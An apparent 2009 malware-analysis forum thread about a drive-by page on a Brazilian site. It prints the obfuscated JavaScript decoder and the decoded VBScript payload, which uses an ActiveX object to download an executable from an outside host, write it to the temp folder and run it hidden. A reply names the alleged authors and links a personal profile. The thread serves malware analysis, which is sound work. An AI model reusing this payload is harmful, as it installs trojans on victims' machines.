Author Topic: viking.com.br - HTML Guardian (Read 6408 times)

SysAdMini · January 29, 2009, 11:48:15 am

viking.com.br/demo.html

Quote

The source code of this page is encrypted with HTML Guardian, the world's standart for website protection

eval 1

function ____(_O0){
  eval(unescape(_O0))
}

eval 2

Code: [Select]

var l2 = window.opera ? 1 : 0;
function l3(l4){
  l5 =/ za / g;
  l6 = String.fromCharCode(0);
  l4 = l4.replace(l5, l6);
  var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
  do {
    l9 = l4.charCodeAt(_1);
    lI = l4.charCodeAt( ++ _1);
    l7[I ++ ] = lI + il - (l9 << 7)
  }
  while (_1 ++< l8);
  var l1 = new Array(), l0 = new Array(), Il = 128;
  do {
    l0[Il] = String.fromCharCode(Il)
  }
  while ( -- Il);
  Il = 128;
  l1[0] = li = l0[l7[0]];
  ll = l7[0];
  _l = 1;
  var l_ = l7.length - 1;
  while (_l < l_){
    switch(l7[_l] < Il ? 1 : 0){
      case0 : l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
      l1[_l] = l0[Il];
      if (l2){
        li += l0[Il]
      }
      ;
      break ;
      default : l1[_l] = l0[l7[_l]];
      if (l2){
        li += l0[l7[_l]]
      }
      ;
      l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
      break 
    }
    ;
    Il++;
    ll = l7[_l];
    _l ++ 
  }
  ;
  if (!l2){
    return (l1.join(''))
  }
  else {
    return li
  }
}
;
var lO = '';
for (ii = 0; ii < OO0O.length; ii ++ ){
  lO += l3(OO0O[ii])
}
;
if (naa){
  document.write(lO)
}
;

writes

Code: [Select]

<script language="VBScript">onerrorresumenextSetobj1 = document.createElement("object")obj1.setAttribute"classid", 
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"est1 = "Microsoft." & "XMLHTTP"Setobj2 = obj1.
CreateObject(est1, "")est = "Ado" & "db." & "Str" & "eam"setobj3 = obj1.createobject(est, 
"")obj3.type = 1est2 = "GET"obj2.Openest2, "http://www.viping.com.br/demo.exe", Falseobj2.
SendsetF = obj1.createobject("Scripting.FileSystemObject", "")setpasta = F.
GetSpecialFolder(2)fi = "tropsp.exe"fi = F.BuildPath(pasta, fi)obj3.openobj3.writeobj2.
responseBodyobj3.savetofilefi, 2obj3.closesetobj5 = obj1.createobject("Shell.Application", 
"")obj5.ShellExecutefi, "", "", "open", 0</script>

downloads demo.exe

http://www.virustotal.com/analisis/966e9d72f6bed639f8c59616c0d4ad25 10/38
MD5...: 76b2a9b0f3c845f73631c9a0733fec90

demo.exe requests

Code: [Select]

http://74.86.166.161/~contar0/manual.pdfwhich is unavailable

Serg · January 29, 2009, 02:57:09 pm

it is brazilian "SexyMoney" from "bl4ck" ) it has banner in each trojan: "Give it all =D", "Cabo a porra toda!" and etc. And here is foto and profile http://profile.myspace.com /index.cfm?fuseaction=user.viewProfile&friendID=83693066 авторов.

BTW manual.pdf is some banker trojan...
PS. Идиоты...

Author Topic: viking.com.br - HTML Guardian (Read 6408 times)

SysAdMini

viking.com.br - HTML Guardian

Serg

Re: viking.com.br - HTML Guardian